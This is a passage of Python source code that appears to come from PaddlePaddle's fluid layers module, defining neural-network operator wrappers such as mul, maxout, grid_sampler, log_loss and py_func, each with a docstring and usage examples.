import paddle.fluid as fluid
b = fluid.default_main_program().global_block()
var = b.create_var(
name="X", dtype="float32", persistable=True,
type=fluid.core.VarDesc.VarType.SELECTED_ROWS)
y = fluid.layers.merge_selected_rows(var)
"""
helper = LayerHelper("merge_selected_rows", **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type="merge_selected_rows",
inputs={"X": x},
attrs={},
outputs={"Out": out})
return out
def mul(x, y, x_num_col_dims=1, y_num_col_dims=1, name=None):
"""
Mul Operator.
This operator is used to perform matrix multiplication for input $x$ and $y$.
The equation is:
.. math::
Out = x * y
Both the input $x$ and $y$ can carry the LoD (Level of Details) information, or not. But the output only shares the LoD information with input $x$.
Args:
x (Variable): The first input Tensor/LoDTensor of mul_op.
y (Variable): The second input Tensor/LoDTensor of mul_op.
x_num_col_dims (int, optional): The mul_op can take tensors with more than two dimensions as its inputs. If the input $x$ is a tensor with more than two dimensions, $x$ will be flattened into a two-dimensional matrix first. The flattening rule is: the first `num_col_dims` will be flattened to form the first dimension of the final matrix (the height of the matrix), and the rest `rank(x) - num_col_dims` dimensions are flattened to form the second dimension of the final matrix (the width of the matrix). As a result, height of the flattened matrix is equal to the product of $x$'s first `x_num_col_dims` dimensions' sizes, and width of the flattened matrix is equal to the product of $x$'s last `rank(x) - num_col_dims` dimensions' size. For example, suppose $x$ is a 6-dimensional tensor with the shape [2, 3, 4, 5, 6], and `x_num_col_dims` = 3. Thus, the flattened matrix will have a shape [2 x 3 x 4, 5 x 6] = [24, 30]. Default is 1.
y_num_col_dims (int, optional): The mul_op can take tensors with more than two dimensions as its inputs. If the input $y$ is a tensor with more than two dimensions, $y$ will be flattened into a two-dimensional matrix first. The attribute `y_num_col_dims` determines how $y$ is flattened. See comments of `x_num_col_dims` for more details. Default is 1.
name (str, optional): Name of the output. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`. Default is None.
Returns:
Variable(Tensor/LoDTensor): The output Tensor/LoDTensor of mul op.
Examples:
.. code-block:: python
import paddle.fluid as fluid
dataX = fluid.layers.data(name="dataX", append_batch_size = False, shape=[2, 5], dtype="float32")
dataY = fluid.layers.data(name="dataY", append_batch_size = False, shape=[5, 3], dtype="float32")
output = fluid.layers.mul(dataX, dataY,
x_num_col_dims = 1,
y_num_col_dims = 1)
"""
if in_dygraph_mode():
return core.ops.mul(x, y, 'x_num_col_dims', x_num_col_dims,
'y_num_col_dims', y_num_col_dims)
inputs = {"X": [x], "Y": [y]}
attrs = {"x_num_col_dims": x_num_col_dims, "y_num_col_dims": y_num_col_dims}
helper = LayerHelper("mul", **locals())
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'mul')
check_variable_and_dtype(y, 'y', ['float16', 'float32', 'float64'], 'mul')
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type="mul", inputs={"X": x,
"Y": y}, attrs=attrs, outputs={"Out": out})
return out
@templatedoc()
def maxout(x, groups, name=None, axis=1):
"""
${comment}
Args:
x(${x_type}): ${x_comment}
groups(int): ${groups_comment}
axis(int, optional): ${axis_comment}
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Variable: ${out_comment}
Raises:
ValueError: If `axis` is not 1, -1 or 3.
ValueError: If the number of input channels can not be divisible by `groups`.
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.data(
name='data',
shape=[None, 256, 32, 32],
dtype='float32')
out = fluid.layers.maxout(input, groups=2)
"""
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'maxout')
helper = LayerHelper("maxout", **locals())
if axis not in [1, -1, 3]:
raise ValueError(
"Attr(axis) should be 1 when data format is NCHW, -1 or 3 when data format is NHWC. Received "
"Attr(axis): %s." % str(axis))
if axis == -1:
axis = 3
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type="maxout",
inputs={"X": x},
attrs={"groups": groups,
"axis": axis},
outputs={"Out": out})
return out
def space_to_depth(x, blocksize, name=None):
"""
Gives a blocksize to space_to_depth the input LoDtensor with Layout: [batch, channel, height, width]
This op rearranges blocks of spatial data, into depth. More specifically, this op outputs a copy of \
theinput LoDtensor where values from the height and width dimensions are moved to the channel \
dimension.
The attr blocksize indicates the input block size.
space_to_depth will reorganize the elements of input with shape[batch, channel, height, width] \
according to blocksize to construct output with shape \
[batch, channel * blocksize * blocksize, height/blocksize, width/blocksize]:
- Non-overlapping blocks of size block_size x block size are rearranged into depth at each location.
- The Y, X coordinates within each block of the input become the high order component of the output channel index
- channel should be divisible by square of blocksize
- height, width should be divsible by blocksize
This OP is useful for resizing the activations between convolutions \
(but keeping all data)
.. code-block:: text
Given the input x with the shape [1, 1, 4, 4]:
x.data = [[[[1, 2, 5, 6],
[3, 4, 7, 8],
[9, 10, 13, 14],
[11, 12, 15, 16]]]]
blocksize = 2
then get the output with the shape [1, 4, 2, 2]:
out.data = [[[[1, 2], [3, 4]],
[[5, 6], [7, 8]],
[[9, 10], [11, 12]],
[[13, 14], [15, 16]]]]
Args:
x (Variable): The input, which should be 4 dims Tensor or LodTensor, with the shape \
[batch, channel, height, width]
blocksize (int): The blocksize to select the element on each feature map should be > 2
name(str, optional): For detailed information, please refer \
to :ref:`api_guide_Name`. Usually name is no need to set and \
None by default.
Returns: The output, which should be 4 dims Tensor or LodTensor, with the shape \
[batch, channel * blocksize * blocksize, height/blocksize, width/blocksize]
Return Type: Variable
Raises:
TypeError: blocksize type must be int64.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
data = fluid.data(
name='data', shape=[1, 4, 2, 2], dtype='float32')
space_to_depthed = fluid.layers.space_to_depth(
x=data, blocksize=2)
exe = fluid.Executor(fluid.CPUPlace())
data_np = np.arange(0,16).reshape((1,4,2,2)).astype('float32')
print(data_np)
#array([[[[ 0., 1.], [ 2., 3.]],
# [[ 4., 5.], [ 6., 7.]],
# [[ 8., 9.], [10., 11.]],
# [[12., 13.], [14., 15.]]]], dtype=float32)
out_main = exe.run(fluid.default_main_program(),
feed={'data': data_np},
fetch_list=[space_to_depthed])
print(out_main)
#[array([[[[ 0.]], [[ 4.]], [[ 1.]], [[ 5.]],
# [[ 8.]], [[12.]], [[ 9.]], [[13.]],
# [[ 2.]], [[ 6.]], [[ 3.]], [[ 7.]],
# [[10.]], [[14.]], [[11.]], [[15.]]]], dtype=float32)]
"""
helper = LayerHelper("space_to_depth", **locals())
if not (isinstance(blocksize, int)):
raise ValueError("blocksize must be a python Int")
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type="space_to_depth",
inputs={"X": x},
attrs={"blocksize": blocksize},
outputs={"Out": out})
return out
def affine_channel(x,
scale=None,
bias=None,
data_layout='NCHW',
name=None,
act=None):
"""
Applies a separate affine transformation to each channel of the input.
Useful for replacing spatial batch norm with its equivalent fixed
transformation. The input also can be 2D tensor and applies a affine
transformation in second dimension.
Args:
x (Variable): Feature map input can be a 4D tensor with order NCHW
or NHWC. It also can be a 2D tensor and the affine transformation
is applied in the second dimension.The data type is float32 or float64.
scale (Variable): 1D input of shape (C), the c-th element is the scale
factor of the affine transformation for the c-th channel of
the input.The data type is float32 or float64.
bias (Variable): 1D input of shape (C), the c-th element is the bias
of the affine transformation for the c-th channel of the input.
The data type is float32 or float64.
data_layout (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`. If input is 2D Tensor, you can ignore
data_layout.
name (str, default None): The name of this layer. For more information,
please refer to :ref:`api_guide_Name` .
act (str, default None): Activation to be applied to the output of this layer.
Returns:
Variable: A tensor which has the same shape, data layout and data type with x.
Examples:
.. code-block:: python
import numpy as np
import paddle.fluid as fluid
use_gpu = False
place = fluid.CUDAPlace(0) if use_gpu else fluid.CPUPlace()
exe = fluid.Executor(place)
data = fluid.data(name='data', shape=[None, 1, 2, 2], dtype='float32')
input_scale = fluid.layers.create_parameter(shape=[1], dtype="float32",
default_initializer=fluid.initializer.Constant(2.0))
input_bias = fluid.layers.create_parameter(shape=[1],dtype="float32",
default_initializer=fluid.initializer.Constant(0.5))
out = fluid.layers.affine_channel(data,scale=input_scale,
bias=input_bias)
exe.run(fluid.default_startup_program())
test_program = fluid.default_main_program().clone(for_test=True)
[out_array] = exe.run(test_program,
fetch_list=out,
feed={'data': np.ones([1,1,2,2]).astype('float32')})
# out_array is [[[[2.5, 2.5],
# [2.5, 2.5]]]] with shape: [1, 1, 2, 2]
"""
helper = LayerHelper("affine_channel", **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type="affine_channel",
inputs={"X": x,
'Scale': scale,
'Bias': bias},
attrs={"data_layout": data_layout},
outputs={"Out": out})
return helper.append_activation(out)
def similarity_focus(input, axis, indexes, name=None):
"""
SimilarityFocus Operator
Generate a similarity focus mask with the same shape of input using the following method:
1. Extract the 3-D tensor(here the first dimension is BatchSize) corresponding
to the axis according to the indexes. For example, if axis=1 and indexes=[a],
it will get the matrix T=X[:, a, :, :]. In this case, if the shape of input X
is (BatchSize, A, B, C), the shape of tensor T is (BatchSize, B, C).
2. For each index, find the largest numbers in the tensor T, so that the same
row and same column has at most one number(what it means is that if the
largest number has been found in the i-th row and the j-th column, then
the numbers in the i-th row or j-th column will be skipped. And then the
next largest number will be selected from the remaining numbers. Obviously
there will be min(B, C) numbers), and mark the corresponding position of the
3-D similarity focus mask as 1, otherwise as 0. Do elementwise-or for
each index.
3. Broadcast the 3-D similarity focus mask to the same shape of input X.
Refer to `Similarity Focus Layer <http://www.aclweb.org/anthology/N16-1108>`_
.. code-block:: text
* Example :
Given a 4-D tensor x with the shape (BatchSize, C, A, B), where C is
the number of channels and the shape of feature map is (A, B):
x.shape = (2, 3, 2, 2)
x.data = [[[[0.8, 0.1],
[0.4, 0.5]],
[[0.9, 0.7],
[0.9, 0.9]],
[[0.8, 0.9],
[0.1, 0.2]]],
[[[0.2, 0.5],
[0.3, 0.4]],
[[0.9, 0.7],
[0.8, 0.4]],
[[0.0, 0.2],
[0.4, 0.7]]]]
Given axis: 1 (the axis of the channel)
Given indexes: [0]
then we get a 4-D tensor out with the same shape of input x:
out.shape = (2, 3, 2, 2)
out.data = [[[[1.0, 0.0],
[0.0, 1.0]],
[[1.0, 0.0],
[0.0, 1.0]],
[[1.0, 0.0],
[0.0, 1.0]]],
[[[0.0, 1.0],
[1.0, 0.0]],
[[0.0, 1.0],
[1.0, 0.0]],
[[0.0, 1.0],
[1.0, 0.0]]]]
Args:
input(Variable): The input tensor variable(default float). It should
be a 4-D tensor with shape [BatchSize, A, B, C]. Data type is
float32 or float64.
axis(int): Indicating the dimension to be selected. It can only be
1, 2 or 3.
indexes(list): Indicating the indexes of the selected dimension.
Returns:
Variable: A tensor variable with the same shape and same type \
as the input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.data(
name='data', shape=[-1, 3, 2, 2], dtype='float32')
fluid.layers.similarity_focus(input=data, axis=1, indexes=[0])
"""
helper = LayerHelper('similarity_focus', **locals())
# check attrs
if isinstance(axis, int) is False:
raise TypeError("axis must be int type.")
if isinstance(indexes, list) is False:
raise TypeError("indexes must be list type.")
if axis != 1 and axis != 2 and axis != 3:
raise ValueError("axis must be 1, 2 or 3.")
if len(indexes) == 0:
raise ValueError("indexes can not be empty.")
out = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type='similarity_focus',
inputs={'X': input},
outputs={'Out': out},
attrs={"axis": axis,
"indexes": indexes})
return out
def hash(input, hash_size, num_hash=1, name=None):
"""
This OP hash the input to an integer less than the hash_size.
The hash algorithm we used was xxHash - Extremely fast hash algorithm
(https://github.com/Cyan4973/xxHash/tree/v0.6.5)
Args:
input(Variable): A **Two-Dimensional** LoDTensor with type int32, int64.
**Only support LoDTensor**.
num_hash(int, optional): The times of hash, default is 1.
name(str, optional): The default value is None. Normally there is no
need for user to set this property. For more information, please
refer to :ref:`api_guide_Name`.
Returns:
Variable: A LoDTensor with the same data type as input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
place = fluid.core.CPUPlace()
x = fluid.data(name="x", shape=[1], dtype="int32", lod_level=1)
res = fluid.layers.hash(name="res",input=x, hash_size=1000, num_hash=4)
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
in1 = np.array([[1,2],[3,4]]).astype("int32")
print(in1)
x_i = fluid.core.LoDTensor()
x_i.set(in1,place)
x_i.set_recursive_sequence_lengths([[0,2]])
res = exe.run(fluid.default_main_program(), feed={'x':x_i}, fetch_list=[res], return_numpy=False)
print(np.array(res[0]))
# [[[722]
# [407]
# [337]
# [395]]
# [[603]
# [590]
# [386]
# [901]]]
"""
helper = LayerHelper('hash', **locals())
out = helper.create_variable_for_type_inference(
helper.input_dtype(), stop_gradient=True)
helper.append_op(
type='hash',
inputs={'X': input},
outputs={'Out': out},
attrs={'num_hash': num_hash,
'mod_by': hash_size})
return out
@templatedoc()
def grid_sampler(x, grid, name=None):
"""
This operation samples input X by using bilinear interpolation based on
flow field grid, which is usually generated by :code:`affine_grid` . The grid of
shape [N, H, W, 2] is the concatenation of (x, y) coordinates
with shape [N, H, W] each, where x is indexing the 4th dimension
(in width dimension) of input data x and y is indexing the 3rd
dimension (in height dimension), finally results is the bilinear
interpolation value of 4 nearest corner points. The output tensor
shape will be [N, C, H, W].
.. code-block:: text
Step 1:
Get (x, y) grid coordinates and scale to [0, H-1/W-1].
.. code-block:: text
grid_x = 0.5 * (grid[:, :, :, 0] + 1) * (W - 1)
grid_y = 0.5 * (grid[:, :, :, 1] + 1) * (H - 1)
Step 2:
Indices input data X with grid (x, y) in each [H, W] area, and bilinear
interpolate point value by 4 nearest points.
wn ------- y_n ------- en
| | |
| d_n |
| | |
x_w --d_w-- grid--d_e-- x_e
| | |
| d_s |
| | |
ws ------- y_s ------- wn
x_w = floor(x) // west side x coord
x_e = x_w + 1 // east side x coord
y_n = floor(y) // north side y coord
y_s = y_s + 1 // south side y coord
d_w = grid_x - x_w // distance to west side
d_e = x_e - grid_x // distance to east side
d_n = grid_y - y_n // distance to north side
d_s = y_s - grid_y // distance to south side
wn = X[:, :, y_n, x_w] // north-west point value
en = X[:, :, y_n, x_e] // north-east point value
ws = X[:, :, y_s, x_w] // south-east point value
es = X[:, :, y_s, x_w] // north-east point value
output = wn * d_e * d_s + en * d_w * d_s
+ ws * d_e * d_n + es * d_w * d_n
Args:
x(Variable): The input tensor, which is a 4-D tensor with shape
[N, C, H, W], N is the batch size, C is the channel
number, H and W is the feature height and width.
The data type is float32 or float64.
grid(Variable): Input grid tensor of shape [N, H, W, 2]. The
data type is float32 or float64.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Variable: Output of shape [N, C, H, W] data samples input X
using bilnear interpolation based on input grid.
The data type is same as input tensor.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# use with affine_grid
x = fluid.data(name='x', shape=[None, 10, 32, 32], dtype='float32')
theta = fluid.layers.data(name='theta', shape=[2, 3], dtype='float32')
grid = fluid.layers.affine_grid(theta=theta, out_shape=[3, 10, 32, 32])
out = fluid.layers.grid_sampler(x=x, grid=grid)
"""
helper = LayerHelper("grid_sampler", **locals())
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'grid_sampler')
check_variable_and_dtype(grid, 'grid', ['float32', 'float64'],
'grid_sampler')
if not isinstance(x, Variable):
return ValueError("The x should be a Variable")
if not isinstance(grid, Variable):
return ValueError("The grid should be a Variable")
out = helper.create_variable_for_type_inference(x.dtype)
ipts = {'X': x, 'Grid': grid}
helper.append_op(type='grid_sampler', inputs=ipts, outputs={'Output': out})
return out
def log_loss(input, label, epsilon=1e-4, name=None):
"""
**Negative Log Loss Layer**
This layer accepts input predictions and target label and returns the
negative log loss.
.. math::
Out = -label * \\log{(input + \\epsilon)}
- (1 - label) * \\log{(1 - input + \\epsilon)}
Args:
input (Variable|list): A 2-D tensor with shape [N x 1], where N is the
batch size. This input is a probability computed
by the previous operator. Data type float32.
label (Variable|list): The ground truth which is a 2-D tensor with
shape [N x 1], where N is the batch size.
Data type float32.
epsilon (float, optional): A small number for numerical stability. Default 1e-4.
name(str|None): For detailed information, please refer to
:ref:`api_guide_Name` . Usually name is no need to set and None by default.
Returns:
Variable: A 2-D tensor with shape [N x 1], the negative log loss.
Examples:
.. code-block:: python
import paddle.fluid as fluid
label = fluid.data(name='label', shape=[None, 1], dtype='float32')
prob = fluid.data(name='prob', shape=[None, 1], dtype='float32')
cost = fluid.layers.log_loss(input=prob, label=label)
"""
helper = LayerHelper('log_loss', **locals())
loss = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type='log_loss',
inputs={'Predicted': [input],
'Labels': [label]},
outputs={'Loss': [loss]},
attrs={'epsilon': epsilon})
return loss
def add_position_encoding(input, alpha, beta, name=None):
"""
This operator performs weighted sum of input feature at each position
(position in the sequence) and the corresponding position encoding.
For more details of position encoding, please refer to `Attention Is All You
Need <http://arxiv.org/pdf/1706.03762.pdf>`_ .
The formula is as follows:
.. math::
PE(pos, 2i) &= \\sin{(pos / 10000^{2i / P})} \\\\
PE(pos, 2i + 1) &= \\cos{(pos / 10000^{2i / P})} \\\\
Out(:, pos, i) &= \\alpha * input(:, pos, i) + \\beta * PE(pos, i)
Where:
- :math:`PE(pos, 2i)` : the value at even index `2i` for encoding of position `pos`.
- :math:`PE(pos, 2i + 1)` : the value at odd index `2i+1` for encoding of position `pos`
Args:
input(Variable): A Tensor or LoDTensor (lod level is 1). If it is a
Tensor, the shape should be `[N, M, P]`, where `N` stands for
batch size, `M` for sequence length, `P` for the size of feature
dimension. If it is a LoDTensor, the shape should be `[N, P]`,
where `N` stands for the total sequence lengths in this mini-batch,
`P` for the size of feature. The data type should be float32 or float64.
alpha(float): Indicate the weight coefficient for `input` when performing
weighted sum.
beta(float): Indicate the weight coefficient for position encoding when
performing weighted sum.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Variable: A Tensor or LoDTensor. It has the same shape, data type and lod as `input`.
Examples:
.. code-block:: python
import paddle.fluid as fluid
tensor = fluid.data(
name='tensor',
shape=[None, 64, 512],
dtype='float32')
position_tensor = fluid.layers.add_position_encoding(
input=tensor, alpha=1.0, beta=1.0)
"""
helper = LayerHelper('add_position_encoding', **locals())
dtype = helper.input_dtype()
out = helper.create_variable_for_type_inference(dtype=dtype)
helper.append_op(
type="add_position_encoding",
inputs={"X": input},
outputs={"Out": out},
attrs={"alpha": alpha,
"beta": beta})
return out
def bilinear_tensor_product(x,
y,
size,
act=None,
name=None,
param_attr=None,
bias_attr=None):
"""
**Bilinear Tensor Product Layer**
This layer performs bilinear tensor product on two inputs.
For example:
.. math::
out_{i} = x * W_{i} * {y^\mathrm{T}}, i=0,1,...,size-1
In this formula:
- :math:`x`: the first input contains M elements, shape is [batch_size, M].
- :math:`y`: the second input contains N elements, shape is [batch_size, N].
- :math:`W_{i}`: the i-th learned weight, shape is [M, N].
- :math:`out_{i}`: the i-th element of out, shape is [batch_size, size].
- :math:`y^\mathrm{T}`: the transpose of :math:`y_{2}`.
Args:
x (Variable): 2-D input tensor with shape [batch_size, M]. Data type
is float32 or float64.
y (Variable): 2-D input tensor with shape [batch_size, N]. Data type
should be same as **x**.
size (int): The dimension of this layer.
act (str|None): Activation to be applied to the output of this layer. Default None.
name(str|None): For detailed information, please refer to
:ref:`api_guide_Name` . Usually name is no need to set and None by default.
param_attr (ParamAttr|None): To specify the weight parameter attribute.
Default: None, which means the default weight parameter property is
used. See usage for details in :ref:`api_fluid_ParamAttr` .
bias_attr (ParamAttr|None): To specify the bias parameter attribute.
Default: None, which means the default bias parameter property is
used. See usage for details in :ref:`api_fluid_ParamAttr` .
Returns:
Variable: A 2-D Tensor of shape [batch_size, size]. Data type is the same as input **x**.
Examples:
.. code-block:: python
import paddle.fluid as fluid
layer1 = fluid.data("t1", shape=[-1, 5], dtype="float32")
layer2 = fluid.data("t2", shape=[-1, 4], dtype="float32")
tensor = fluid.layers.bilinear_tensor_product(x=layer1, y=layer2, size=1000)
"""
helper = LayerHelper('bilinear_tensor_product', **locals())
dtype = helper.input_dtype('x')
param_shape = [size, x.shape[1], y.shape[1]]
w = helper.create_parameter(
attr=helper.param_attr, shape=param_shape, dtype=dtype, is_bias=False)
out = helper.create_variable_for_type_inference(dtype=dtype)
inputs = {"X": x, "Y": y, "Weight": w}
if helper.bias_attr:
bias_size = [1, size]
bias = helper.create_parameter(
attr=helper.bias_attr, shape=bias_size, dtype=dtype, is_bias=True)
inputs["Bias"] = bias
helper.append_op(
type="bilinear_tensor_product", inputs=inputs, outputs={"Out": out})
# add activation
return helper.append_activation(out)
@templatedoc()
def get_tensor_from_selected_rows(x, name=None):
"""
This operator gets tensor data from input with SelectedRows type, and outputs a LoDTensor.
.. code-block:: text
input x is SelectedRows:
x.rows = [0, 5, 5, 4, 19]
x.height = 20
x.value = [[1, 1] [2, 2] [2, 2] [3, 3] [6, 6]]
Ouput is LoDTensor:
out.shape = [5, 2]
out.data = [[1, 1],
[2, 2],
[2, 2],
[3, 3],
[6, 6]]
Args:
x(SelectedRows): Input with SelectedRows type. The data type is float32, float64, int32 or int64.
name(str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
Variable: LoDTensor transformed from SelectedRows. The data type is same with input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
b = fluid.default_main_program().global_block()
input = b.create_var(name="X", dtype="float32", persistable=True, type=fluid.core.VarDesc.VarType.SELECTED_ROWS)
out = fluid.layers.get_tensor_from_selected_rows(input)
"""
helper = LayerHelper('get_tensor_from_selected_rows', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='get_tensor_from_selected_rows',
inputs={'X': x},
outputs={'Out': out},
attrs={})
return out
def shuffle_channel(x, group, name=None):
"""
This operator shuffles the channels of input x.
It divide the input channels in each group into :attr:`group` subgroups,
and obtain a new order by selecting element from every subgroup one by one.
Please refer to the paper
https://arxiv.org/pdf/1707.01083.pdf
.. code-block:: text
Given a 4-D tensor input with the shape (N, C, H, W):
input.shape = (1, 4, 2, 2)
input.data =[[[[0.1, 0.2],
[0.2, 0.3]],
[[0.3, 0.4],
[0.4, 0.5]],
[[0.5, 0.6],
[0.6, 0.7]],
[[0.7, 0.8],
[0.8, 0.9]]]]
Given group: 2
then we get a 4-D tensor out whth the same shape of input:
out.shape = (1, 4, 2, 2)
out.data = [[[[0.1, 0.2],
[0.2, 0.3]],
[[0.5, 0.6],
[0.6, 0.7]],
[[0.3, 0.4],
[0.4, 0.5]],
[[0.7, 0.8],
[0.8, 0.9]]]]
Args:
x(Variable): The input tensor variable. It should be a 4-D tensor with shape [N, C, H, W]
group(int): Indicating the counts of subgroups, It should divide the number of channels.
Returns:
out(Variable): the channels shuffling result is a tensor variable with the
same shape and same type as the input.
Raises:
ValueError: If group is not an int type variable.
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.data(name='input', shape=[None,4,2,2], dtype='float32')
out = fluid.layers.shuffle_channel(x=input, group=2)
"""
helper = LayerHelper("shuffle_channel", **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
if not isinstance(group, int):
raise TypeError("group must be int type")
helper.append_op(
type="shuffle_channel",
inputs={"X": x},
outputs={"Out": out},
attrs={"group": group})
return out
@templatedoc()
def temporal_shift(x, seg_num, shift_ratio=0.25, name=None):
"""
**Temporal Shift Operator**
${comment}
Args:
x(Variable): ${x_comment}
seg_num(int): ${seg_num_comment}
shift_ratio(float): ${shift_ratio_comment}
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
out(Variable): The temporal shifting result is a tensor variable with the
same shape and same data type as the input.
Raises:
TypeError: seg_num must be int type.
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.data(name='input', shape=[None,4,2,2], dtype='float32')
out = fluid.layers.temporal_shift(x=input, seg_num=2, shift_ratio=0.2)
"""
helper = LayerHelper("temporal_shift", **locals())
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'temporal_shift')
check_type(seg_num, 'seg_num', int, 'temporal_shift')
check_type(shift_ratio, 'shift_ratio', float, 'temporal_shift')
out = helper.create_variable_for_type_inference(dtype=x.dtype)
if not isinstance(seg_num, int):
raise TypeError("seg_num must be int type.")
helper.append_op(
type="temporal_shift",
inputs={"X": x},
outputs={"Out": out},
attrs={"seg_num": seg_num,
"shift_ratio": shift_ratio})
return out
class PyFuncRegistry(object):
_register_funcs = []
def __init__(self, func):
if func is None or not callable(func):
raise TypeError('func must be a Python function')
self._func = func
# find named args using reflection
args = inspect.getargspec(self._func)
if len(args[0]) == 0 and args[1] is None and args[2] is None:
# Function with no inputs
self._named_args = None
else:
self._named_args = args[0]
self._id = core._append_python_callable_object_and_return_id(self)
'''
Why record self here?
1. For debug usage. Users can call
:code:`py_func.registered_func(idx)` method
to find the registered function corresponding
to :code:`idx`.
2. For increasing reference count of self.
It seems that to release Python object
whose reference count is 1 would cause
segmentation fault error in C++ side.
May be lack of Python GC in C++ side?
'''
PyFuncRegistry._register_funcs.append(self)
@classmethod
def registered_func(cls, idx):
return cls._register_funcs[idx]._func
@classmethod
def registered_func_num(cls):
return len(cls._register_funcs)
@property
def id(self):
return self._id
def __call__(self, *args):
if self._named_args is None:
func_ret = self._func()
else:
kwargs = dict()
idx = 0
for arg in self._named_args:
kwargs[arg] = args[idx]
idx += 1
func_ret = self._func(*args[idx:], **kwargs)
if not isinstance(func_ret, (list, tuple)):
func_ret = (func_ret, )
ret = []
for each_ret in func_ret:
if each_ret is None or isinstance(each_ret, core.LoDTensor):
ret.append(each_ret)
continue
if not isinstance(each_ret, np.ndarray):
each_ret = np.array(each_ret)
tensor = core.LoDTensor()
tensor.set(each_ret, core.CPUPlace())
ret.append(tensor)
return tuple(ret)
@templatedoc()
def py_func(func, x, out, backward_func=None, skip_vars_in_backward_input=None):
"""
This OP is used to register customized Python OP to Paddle Fluid. The design
principe of py_func is that LodTensor and numpy array can be converted to each
other easily. So you can use Python and numpy API to register a python OP.
The forward function of the registered OP is ``func`` and the backward function
of that is ``backward_func``. Paddle will call ``func`` at forward runtime and
call ``backward_func`` at backward runtime(if ``backward_func`` is not None).
``x`` is the input of ``func``, whose type must be LoDTensor; ``out`` is
the output of ``func``, whose type can be either LoDTensor or numpy array.
The input of the backward function ``backward_func`` is ``x``, ``out`` and
the gradient of ``out``. If some variables of ``out`` have no gradient, the
relevant input variable of ``backward_func`` is None. If some variables of
``x`` do not have a gradient, the user should return None in ``backward_func``.
The data type and shape of ``out`` should also be set correctly before this
API is called, and the data type and shape of the gradient of ``out`` and
``x`` will be inferred automatically.
This API can also be used to debug the neural network by setting the ``func``
as a function that only print variables.
Args:
func (callable): The forward function of the registered OP. When the network
is running, the forward output ``out`` will be calculated according to this
function and the forward input ``x``. In ``func`` , it's suggested that we
actively convert LoDTensor into a numpy array, so that we can use Python and
numpy API arbitrarily. If not, some operations of numpy may not be compatible.
x (Variable|tuple(Variale)|list[Variale]): The input of the forward function ``func``.
It can be Variable|tuple(Variale)|list[Variale], where Variable is LoDTensor or
Tenosor. In addition, Multiple Variable should be passed in the form of tuple(Variale)
or list[Variale].
out (Variable|tuple(Variale)|list[Variale]): The output of the forward function ``func``,
it can be Variable|tuple(Variale)|list[Variale], where Variable can be either LoDTensor
or numpy array. Since Paddle cannot automatically infer the shape and type of ``out``,
you must create ``out`` in advance.
backward_func (callable, optional): The backward function of the registered OP.
Its default value is None, which means there is no reverse calculation. If
it is not None, ``backward_func`` is called to calculate the gradient of
``x`` when the network is at backward runtime.
skip_vars_in_backward_input (Variable, optional): It's used to limit the input
variable list of ``backward_func``, and it can be Variable|tuple(Variale)|list[Variale].
It must belong to either ``x`` or ``out``. The default value is None, which means
that no variables need to be removed from ``x`` and ``out``. If it is not None,
these variables will not be the input of ``backward_func``. This parameter is only
useful when ``backward_func`` is not None.
Returns:
Variable|tuple(Variale)|list[Variale]: The output ``out`` of the forward function ``func``.
Examples:
.. code-block:: python
# example 1:
import paddle.fluid as fluid
import six
# Creates a forward function, LodTensor can be input directly without
# being converted into numpy array.
def tanh(x):
return np.tanh(x)
# Skip x in backward function and return the gradient of x
# LodTensor must be actively converted to numpy array, otherwise,
# operations such as +/- can't be used.
def tanh_grad(y, dy):
return np.array(dy) * (1 - np.square(np.array(y)))
# Creates a forward function for debugging running networks(print value)
def debug_func(x):
print(x)
def create_tmp_var(name, dtype, shape):
return fluid.default_main_program().current_block().create_var(
name=name, dtype=dtype, shape=shape)
def simple_net(img, label):
hidden = img
for idx in six.moves.range(4):
hidden = fluid.layers.fc(hidden, size=200)
new_hidden = create_tmp_var(name='hidden_{}'.format(idx),
dtype=hidden.dtype, shape=hidden.shape)
# User-defined forward and backward
hidden = fluid.layers.py_func(func=tanh, x=hidden,
out=new_hidden, backward_func=tanh_grad,
skip_vars_in_backward_input=hidden)
# User-defined debug functions that print out the input LodTensor
fluid.layers.py_func(func=debug_func, x=hidden, out=None)
prediction = fluid.layers.fc(hidden, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=prediction, label=label)
return fluid.layers.mean(loss)
# example 2:
# This example shows how to turn LoDTensor into numpy array and
# use numpy API to register an Python OP
import paddle.fluid as fluid
import numpy as np
def element_wise_add(x, y):
# LodTensor must be actively converted to numpy array, otherwise,
# numpy.shape can't be used.
x = np.array(x)
y = np.array(y)
